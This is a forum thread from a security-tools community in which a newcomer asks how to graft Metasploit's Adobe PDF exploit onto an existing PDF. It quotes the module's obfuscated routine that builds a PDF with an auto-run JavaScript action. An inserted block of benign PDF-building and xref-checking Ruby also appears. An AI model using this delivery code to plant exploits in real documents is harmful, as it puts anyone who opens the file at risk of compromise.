Thread: MSF : My first exploit

  1. #1 Just burned his ISO (Join Date: Mar 2010, Location: Quebec, Posts: 3)

    MSF : My first exploit

    Hi,

    This is my first post, so apologies for my English (I'm French).
    I discovered BackTrack about a year ago and used it mainly for learning WEP and WPA cracking techniques. Recently I discovered this powerful tool called MSF. I began reading docs and tutorials and testing on my own (and picking up Ruby development basics; my background is more Java). I'm quite interested in PDF exploits because, in my opinion, they are very dangerous (popular exchange format).

    This made me interested in the recent adobe_media_newplayer exploit.
    I think I basically understand how it works, but I asked myself how it would be possible to fill up the PDF (instead of getting an empty one). This example may let me learn Ruby more deeply, with file editing, and adapt an exploit to my needs.

    Enough of the introduction; on to my problem:

    My first idea was to take an input PDF file and add the exploit to it.
    So I studied this part of adobe_media_newplayer.rb:
    Code:
    def make_pdf(js)
    
    		xref = []
    		eol = "\x0d\x0a"
    		endobj = "endobj" << eol
    
    		pdf = "%PDF-1.5" << eol
    		pdf << "%" << RandomNonASCIIString(4) << eol
    		xref << pdf.length
    		pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
    		xref << pdf.length
    		pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
    		xref << pdf.length
    		pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
    		xref << pdf.length
    		pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
    		xref << pdf.length
    		pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
    		xref << pdf.length
    		compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
    		pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    		pdf << "stream" << eol
    		pdf << compressed << eol
    		pdf << "endstream" << eol
    		pdf << endobj
    		xrefPosition = pdf.length
    		pdf << "xref" << eol
    		pdf << "0 %d" % (xref.length + 1) << eol
    		pdf << "0000000000 65535 f" << eol
    		xref.each do |index|
    			pdf << "%010d 00000 n" % index << eol
    		end
    		pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
    		pdf << "startxref" << eol
    		pdf << xrefPosition.to_s() << eol
    		pdf << "%%EOF" << eol
    
    	end
    To help me, I found another PDF exploit that adds a payload to an already crafted PDF file: adobe_pdf_embedded_exe.rb.

    So here are my questions:

    1. Is that possible, and wouldn't it be better to rewrite the part presented above using Msf::Exploit::PDF_Parse to craft the file?

    2. If so, is there a place where I can find some documentation about Msf::Exploit::PDF_Parse? I'm already reading the PDF format specification more deeply, but I have some trouble understanding all of this.

    3. Could someone help me understand (basically) what this method does? My Ruby basics aren't sufficient, I think :/
    def basic_social_engineering_exploit(xref_trailers, root_obj, stream, trailers, file_name, exe_name, startxref) in adobe_pdf_embedded_exe.rb

    4. Last but not least, am I going the right way?

    See you !
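The part of make_pdf that is easy to miss is the offset bookkeeping: every object's byte position is pushed into xref before the object is written, and the trailer's startxref must point at the xref table itself. The following is an added example, not code from the thread or from the Metasploit module: build_minimal_pdf mirrors that layout with an ordinary page content stream in place of the /OpenAction JavaScript object, and xref_consistent? walks the resulting table back the other way, a triage check that flags PDFs whose xref entries do not point at the objects they claim (function names and the sample text are my own).

```ruby
require 'zlib'

EOL = "\r\n"   # same two-byte line ending make_pdf uses, so xref entries stay 20 bytes

# Build a PDF with the same object layout as make_pdf (Catalog, Pages, Page,
# one deflated stream) but with an ordinary page content stream instead of an
# /OpenAction JavaScript object. Offsets are byte offsets, hence the .b strings.
def build_minimal_pdf(text)
  xref = []                                   # byte offset of each object
  obj  = ->(n, body) { "#{n} 0 obj#{EOL}#{body}#{EOL}endobj#{EOL}" }
  pdf  = "%PDF-1.5#{EOL}%".b << [0xE2, 0xE3, 0xCF, 0xD3].pack("C*") << EOL
  xref << pdf.length
  pdf << obj.call(1, "<</Type/Catalog/Pages 2 0 R>>")
  xref << pdf.length
  pdf << obj.call(2, "<</Type/Pages/Kids[3 0 R]/Count 1>>")
  xref << pdf.length
  pdf << obj.call(3, "<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Contents 4 0 R>>")
  xref << pdf.length
  stream = Zlib::Deflate.deflate("BT /F1 12 Tf 72 720 Td (#{text}) Tj ET")
  pdf << "4 0 obj#{EOL}<</Length #{stream.length}/Filter/FlateDecode>>#{EOL}"
  pdf << "stream#{EOL}" << stream << "#{EOL}endstream#{EOL}endobj#{EOL}"
  xref_pos = pdf.length                       # what startxref must point at
  pdf << "xref#{EOL}0 #{xref.length + 1}#{EOL}0000000000 65535 f#{EOL}"
  xref.each { |off| pdf << ("%010d 00000 n" % off) << EOL }
  pdf << "trailer<</Size #{xref.length + 1}/Root 1 0 R>>#{EOL}"
  pdf << "startxref#{EOL}#{xref_pos}#{EOL}%%EOF#{EOL}"
end

# Triage check: follow startxref, walk the xref table and confirm every in-use
# entry really points at "N 0 obj". Hand-edited or malformed PDFs often fail this.
def xref_consistent?(pdf)
  pdf = pdf.b
  tail = pdf.match(/startxref\s+(\d+)\s+%%EOF/)
  return false unless tail
  pos = tail[1].to_i
  return false unless pdf[pos, 4] == "xref"
  hdr = pdf.match(/xref\s+(\d+)\s+(\d+)\s+/, pos)
  return false unless hdr
  first, count, cursor = hdr[1].to_i, hdr[2].to_i, hdr.end(0)
  count.times do |i|
    entry = pdf[cursor, 18]
    return false if entry.nil? || entry.length < 18
    cursor += 20                              # every xref entry is 20 bytes
    next if entry[17] == "f"                  # free entry, nothing to check
    off = entry[0, 10].to_i
    return false unless pdf[off, 20].to_s.start_with?("#{first + i} 0 obj")
  end
  true
end
```

Inserting a single byte anywhere before the xref table (for example, a space after the %PDF-1.5 header) is enough to make the check fail, which is exactly why make_pdf records pdf.length before each object rather than after.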

  2. #2 Super Moderator lupin (Join Date: Jan 2010, Posts: 2,943)

    Re: MSF : My first exploit

    You might be better off asking these questions direct to the Metasploit Devs.

    From what I can tell after looking at this for about two minutes, PDF_Parse is used to parse an existing PDF file, not to create a new one. The code you reproduced above is probably a good way to create a new PDF (since HDM was involved in writing that sploit, I'm assuming that this is the correct way to go about it).
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3 Just burned his ISO (Join Date: Jan 2010, Posts: 6)

    Re: MSF : My first exploit

    spool.metasploit.com Mailing Lists

    You can join this mailing list. HD, Joshua or Carlos R help others very quickly.

  4. #4 Just burned his ISO (Join Date: Mar 2010, Location: Quebec, Posts: 3)

    Re: MSF : My first exploit

    Thank you very much for your quick and precise answers (I was thinking my post would never be "posted").
    I'll ask the Metasploit Devs directly.

  5. #5 My life is this forum thorin (Join Date: Jan 2010, Posts: 2,629)

    Re: MSF : My first exploit

    Didier Stevens has done a lot of work with PDF exploits in the past, you might find something helpful on his blog.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  6. #6 Just burned his ISO (Join Date: Mar 2010, Location: Quebec, Posts: 3)

    Re: MSF : My first exploit

    Well, thank you for this. His blog gave me some search directions.
    All your advice gave me my answer:
    1- Learn more about PDF format
    2- Increase my Ruby skills

    3- Try harder

    Thank you all !

    edit: Done! The new exploit works correctly on PDFs that aren't too complicated (encryption, etc.). I posted it on MSF's mailing list to see if the code can be cleaned up, but it works anyway.
    Last edited by aemaeth; 04-02-2010 at 01:17 PM.